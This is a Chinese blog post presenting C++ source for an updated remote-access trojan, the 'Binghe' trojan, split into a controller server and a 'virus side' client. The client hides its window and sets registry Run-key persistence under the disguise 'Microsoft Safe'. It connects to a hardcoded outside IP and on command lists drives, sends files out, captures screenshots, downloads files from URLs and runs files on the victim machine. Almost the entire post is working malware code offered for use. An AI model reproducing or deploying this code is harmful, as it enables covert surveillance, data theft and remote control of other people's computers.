C++ 冰河木马更新版本
2022-05-19
因为一些原因冰河木马我重新写了一次
先说更新后的功能:
这次可以修改注册表实现无限自启动
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
这次可以让对方电脑打开对方硬盘文件
远控端
/*server*/
#include <winsock2.h>
#include<iostream>
#include<string>
#include <fstream>
using namespace std;
#pragma comment(lib,"ws2_32.lib")//链接这个库
//TCP服务器端
void RecvFile(SOCKET sClient, string SaveFileName);
int connect();
int main()
{
int temp = 10;
while (true)
{
if (temp == 10)
{
temp = connect();
}
else
{
}
}
return 0;
}
int connect()
{
//调用winsock
WORD sockVersion = MAKEWORD(2, 2);//请求使用的winsock版本
WSADATA wsaData; // 实际返回的winsock版本
if (WSAStartup(sockVersion, &wsaData) != 0)
{
}
//创建socket
SOCKET slisten = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);//参数分别为协议族,类型,协议号 AF_INET代表TCP/IP
if (slisten == INVALID_SOCKET)//异常处理
{
printf("scoket error!\n");
return 10;
}
//bind
sockaddr_in sin; //服务器端点地址
sin.sin_family = AF_INET; //协议族
sin.sin_port = htons(80); //端口号, htons函数将本地字节顺序变为网络字节顺序(16位)
sin.sin_addr.S_un.S_addr = INADDR_ANY;//服务器bind时需要使用地址通配
if (bind(slisten, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR)//LPSOCKADDR是类型强制转换
{
printf("bind error !\n");
return 10;
}
//listen
if (listen(slisten, 5) == SOCKET_ERROR)//5为queuesize,缓存区大小
{
printf("listen error !\n");
return 10;
}
//由于使用的是TCP ,socket stream,要循环接收数据
SOCKET sClient;//声明变量
sockaddr_in remoteAddr;
int nAddrlen = sizeof(remoteAddr);
char revData[1024];//buffer
printf("waiting for connect...\n\n");
while (true)
{
printf("command:");
string data;
getline(cin, data);//键盘读入数据
const char* sendData;
sendData = data.c_str(); //string变为const char*
sClient = accept(slisten, (SOCKADDR *)&remoteAddr, &nAddrlen);//accept会新建一个socket
if (sClient == INVALID_SOCKET)
{
printf("accept error !");
continue;//重新开始循环
}
printf("someone ip: %s\r\n", inet_ntoa(remoteAddr.sin_addr)); //inet将ip地址结构转成字符串 , \r是回车
//发送数据
send(sClient, sendData, strlen(sendData), 0);
//接收数据
//接收文件
if (data.find("pass") != string::npos)//pass-D:\\001.txt-D:\\002.txt
{
string savepath = data.substr(data.find_last_of("-") + 1);
RecvFile(sClient, savepath);
}
//接收字符串
else
{
int ret = recv(sClient, revData, 1024, 0);
printf("feedback:\n");
while (true)
{
if (ret > 0)
{
revData[ret] = 0x00;
printf(revData);
ret = recv(sClient, revData, 1024, 0);
}
break;
}
printf("\n\n");
}
closesocket(sClient);
}
closesocket(slisten);
WSACleanup();
}
void RecvFile(SOCKET sClient, string SaveFileName)
{
cout << "receive start" << endl;
const int bufferSize = 1024;
char buffer[bufferSize] = { 0 };
int readLen = 0;
//string SaveFileName ; //这是服务器要接收的文件的保存路径
ofstream desFile;
desFile.open(SaveFileName.c_str(), ios::binary);
if (!desFile)
{
return;
}
do
{
readLen = recv(sClient, buffer, bufferSize, 0);
if (readLen == 0)
{
break;
}
else
{
desFile.write(buffer, readLen);
cout << "receiving" << endl;
}
} while (true);
cout << "receive over\n\n" << endl;
desFile.close();
}病毒端
/*client*/
#include<iostream>
#include <io.h>
#include <sstream>
#include <afxwin.h>
#include <windows.h>
#include <fstream>
#include <winsock2.h>
using namespace std;
#pragma comment(lib,"ws2_32.lib")//windowssock库
#pragma comment(lib,"Urlmon.lib") //加入文件传输库
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) // 这就是最重要的一个隐藏程序的代码
//TCP客户端
#define _CRT_SECURE_NO_WARNINGS
/*函数申明*/
int connect();
int set();
string deal(string things);
string GetProgramDir();
void download(string dourl, string a);
void SendFile(SOCKET sclient, string srcFileName);
string dir(string path);
void Screen(char filename[]);
LPWSTR ConvertCharToLPWSTR(const char* szString);
LPCWSTR stringToLPCWSTR(std::string orig);
TCHAR* CharToTCHAR(char* pChar);
int main()
{
set();
int temp = 10;
while (true)
{
if (temp = 10)
{
temp = connect();
}
else
{
break;
}
}
return 0;
}
/*Char转TCHAR*/
TCHAR* CharToTCHAR(char* pChar)
{
TCHAR *pTchar = nullptr;
int nLen = strlen(pChar) + 1;
pTchar = new wchar_t[nLen];
MultiByteToWideChar(CP_ACP, 0, pChar, nLen, pTchar, nLen);
return pTchar;
}
/*Char*转TCHAR*/
LPWSTR ConvertCharToLPWSTR(const char* szString)
{
int dwLen = strlen(szString) + 1;
int nwLen = MultiByteToWideChar(CP_ACP, 0, szString, dwLen, NULL, 0);//算出合适的长度
LPWSTR lpszPath = new WCHAR[dwLen];
MultiByteToWideChar(CP_ACP, 0, szString, dwLen, lpszPath, nwLen);
return lpszPath;
}
/*string转LPCWSTR*/
LPCWSTR stringToLPCWSTR(std::string orig)
{
size_t origsize = orig.length() + 1;
const size_t newsize = 100;
size_t convertedChars = 0;
wchar_t *wcstring = (wchar_t *)malloc(sizeof(wchar_t)*(orig.length() - 1));
mbstowcs_s(&convertedChars, wcstring, origsize, orig.c_str(), _TRUNCATE);
return wcstring;
}
/*获取本程序绝对路径*/
string GetProgramDir()
{
char exeFullPath[MAX_PATH]; // Full path
LPWSTR exeFullPath1 = ConvertCharToLPWSTR(exeFullPath);
string strPath = "";
GetModuleFileName(NULL, exeFullPath1, MAX_PATH);
strPath = (string)exeFullPath; // Get full path of the file
int pos = strPath.find_last_of('\\', strPath.length());
return strPath.substr(0, pos); // Return the directory without the file name
}
/*写入注册表实现开机自动启动*/
int set()
{
LPCTSTR lpSubKey = L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
HKEY hKey;
REGSAM flag = KEY_WOW64_64KEY;
DWORD dwDisposition = REG_OPENED_EXISTING_KEY;
LONG lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpSubKey, 0, KEY_ALL_ACCESS | flag, &hKey);
//LONG lRet = ::RegCreateKeyEx(HKEY_LOCAL_MACHINE, lpSubKey, NULL, NULL, REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS, NULL, &hKey, &dwDisposition);
if (ERROR_SUCCESS != lRet)
{
printf("打开注册表失败,也许是权限不足");
while (1);
return 0;
}
string file = GetProgramDir();
TCHAR exeFullPath[MAX_PATH]; // Full path
GetModuleFileName(NULL, exeFullPath, MAX_PATH);
char *file1 = const_cast<char*>(file.c_str());
const char *pchrName1 = file.c_str();
lRet = ::RegSetValueEx(hKey, TEXT("Microsoft Safe"), NULL, REG_SZ, (LPBYTE)exeFullPath, strlen(pchrName1)*sizeof(TCHAR)+1); //设置注册表项
if (ERROR_SUCCESS != lRet)
{
printf("写入注册表失败,也许是权限不足");
while (1);
return 0;
}
::RegCloseKey(hKey); //与RegCreateKeyEx配对写
printf("成功");
}
/*传输文件*/
void SendFile(SOCKET sclient, string srcFileName)
{
int haveSend = 0;
const int bufferSize = 1024;
char buffer[bufferSize] = { 0 };
int readLen = 0;
//string srcFileName ; //这是用户端要发送的路径
ifstream srcFile;
srcFile.open(srcFileName.c_str(), ios::binary);
if (!srcFile){
return;
}
while (!srcFile.eof()){
srcFile.read(buffer, bufferSize);
readLen = srcFile.gcount();
send(sclient, buffer, readLen, 0);
haveSend += readLen;
}
srcFile.close();
cout << "send: " << haveSend << "B" << endl;
}
/*套接字连接程序*/
int connect()
{
WORD sockVersion = MAKEWORD(2, 2);
WSADATA data;
if (WSAStartup(sockVersion, &data) != 0)
{
printf("initialization failed!\n");
return 10;
}
while (true)
{
SOCKET sclient = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sclient == INVALID_SOCKET)
{
printf("invalid socket!\n");
return 10;
}
sockaddr_in serAddr; //要连接的服务器端 的 端点地址
serAddr.sin_family = AF_INET;
serAddr.sin_port = htons(80);
serAddr.sin_addr.S_un.S_addr = inet_addr("175.24.174.70"); //将ip变为地址结构
//客户端程序不需要bind本机端点地址,系统会自动完成
if (connect(sclient, (sockaddr*)&serAddr, sizeof(serAddr)) == SOCKET_ERROR)
{
printf("connect error!\n");
closesocket(sclient);
return 10;
}
char recData[1024];
string a;
int ret = recv(sclient, recData, 1024, 0);
if (ret>0)
{
recData[ret] = 0x00;
cout << "command:" << recData << endl;
string CMD(recData);
a = deal(CMD);
}
if (a.find("pass") != string::npos)
{
string sendfile = a.substr(a.find_last_of("-") + 1);
SendFile(sclient, sendfile);
closesocket(sclient);
}
else
{
string data;
data = a;
const char* sendData;
sendData = data.c_str(); //string21变为const char*
cout << strlen(sendData) << endl;
send(sclient, sendData, strlen(sendData), 0);
closesocket(sclient);
}
}
WSACleanup();
}
/*指令处理函数*/
string deal(string things)
{
//分析命令
if (things.find("dir") != string::npos)/* dir-D:\\ */
{
string result = things.substr(things.find_first_of("-") + 1);
string temp = dir(result);
cout << temp << endl;
return temp;
}
else if (things.find("down") != string::npos)//down-http://www.anyeur.club-D:index.php
{
string downurl = things.substr(things.find_first_of("-") + 1, things.find_last_of("-") - things.find_first_of("-") - 1);
string savepath = things.substr(things.find_last_of("-") + 1);
download(downurl, savepath);
return "download over!";
}
else if (things.find("pass") != string::npos)//pass-D:\\001.txt-D:\\002.txt
{
string sendfile = things.substr(things.find_first_of("-") + 1, things.find_last_of("-") - things.find_first_of("-") - 1);
return "pass-" + sendfile;
}
else if (things.find("screen") != string::npos)//screen-D:\\001.jpg
{
string savepat = things.substr(things.find_last_of("-") + 1);
char savepath[20];
strcpy(savepath, savepat.c_str());
Screen(savepath);
return "screen over!";
}
else if (things.find("open") != string::npos)//open-D:\\001.jpg
{
string openfile = things.substr(things.find_last_of("-") + 1);
const char * filename = openfile.c_str();
system(filename);
return "open over!";
}
else
{
return "nothing";
}
}
/*下载文件*/
void download(string dourl, string a)
{
LPCWSTR url = stringToLPCWSTR(dourl);
printf("downurl: %S\n", url);
TCHAR path[MAX_PATH];
GetCurrentDirectory(MAX_PATH, path);
LPCWSTR savepath = stringToLPCWSTR(a);
wsprintf(path, savepath, path);
printf("savepath: %S\n", path);
HRESULT res = URLDownloadToFile(NULL, url, path, 0, NULL);
if (res == S_OK)
{
printf("downover\n");
}
else if (res == E_OUTOFMEMORY)
{
printf("recvlength has something wrong or dont set recvlength\n");
}
else if (res == INET_E_DOWNLOAD_FAILURE)
{
printf("url has something wrong\n");
}
else
{
printf("unkonwn error\n", res);
}
}
/*获取路径*/
string dir(string path)
{
string result;
long hFile = 0;
struct _finddata_t fileInfo;
string pathName, exdName;
// \\* 代表要遍历所有的类型,如改成\\*.jpg表示遍历jpg类型文件
if ((hFile = _findfirst(pathName.assign(path).append("\\*").c_str(), &fileInfo)) == -1)
{
}
do
{
result = result + "\n" + fileInfo.name;
} while (_findnext(hFile, &fileInfo) == 0);
_findclose(hFile);
return result;
}
/*截屏*/
void Screen(char filename[])
{
CDC *pDC;//屏幕DC
pDC = CDC::FromHandle(GetDC(NULL));//获取当前整个屏幕DC
int BitPerPixel = pDC->GetDeviceCaps(BITSPIXEL);//获得颜色模式
int Width = pDC->GetDeviceCaps(HORZRES);
int Height = pDC->GetDeviceCaps(VERTRES);
printf("当前屏幕色彩模式为%d位色彩\n", BitPerPixel);
printf("屏幕宽度:%d\n", Width);
printf("屏幕高度:%d\n", Height);
CDC memDC;//内存DC
memDC.CreateCompatibleDC(pDC);
CBitmap memBitmap, *oldmemBitmap;//建立和屏幕兼容的bitmap
memBitmap.CreateCompatibleBitmap(pDC, Width, Height);
oldmemBitmap = memDC.SelectObject(&memBitmap);//将memBitmap选入内存DC
memDC.BitBlt(0, 0, Width, Height, pDC, 0, 0, SRCCOPY);//复制屏幕图像到内存DC
//以下代码保存memDC中的位图到文件
BITMAP bmp;
memBitmap.GetBitmap(&bmp);//获得位图信息
FILE *fp = fopen(filename, "w+b");
BITMAPINFOHEADER bih = { 0 };//位图信息头
bih.biBitCount = bmp.bmBitsPixel;//每个像素字节大小
bih.biCompression = BI_RGB;
bih.biHeight = bmp.bmHeight;//高度
bih.biPlanes = 1;
bih.biSize = sizeof(BITMAPINFOHEADER);
bih.biSizeImage = bmp.bmWidthBytes * bmp.bmHeight;//图像数据大小
bih.biWidth = bmp.bmWidth;//宽度
BITMAPFILEHEADER bfh = { 0 };//位图文件头
bfh.bfOffBits = sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER);//到位图数据的偏移量
bfh.bfSize = bfh.bfOffBits + bmp.bmWidthBytes * bmp.bmHeight;//文件总的大小
bfh.bfType = (WORD)0x4d42;
fwrite(&bfh, 1, sizeof(BITMAPFILEHEADER), fp);//写入位图文件头
fwrite(&bih, 1, sizeof(BITMAPINFOHEADER), fp);//写入位图信息头
byte * p = new byte[bmp.bmWidthBytes * bmp.bmHeight];//申请内存保存位图数据
GetDIBits(memDC.m_hDC, (HBITMAP)memBitmap.m_hObject, 0, Height, p,
(LPBITMAPINFO)&bih, DIB_RGB_COLORS);//获取位图数据
fwrite(p, 1, bmp.bmWidthBytes * bmp.bmHeight, fp);//写入位图数据
delete[] p;
fclose(fp);
memDC.SelectObject(oldmemBitmap);
}
发表评论: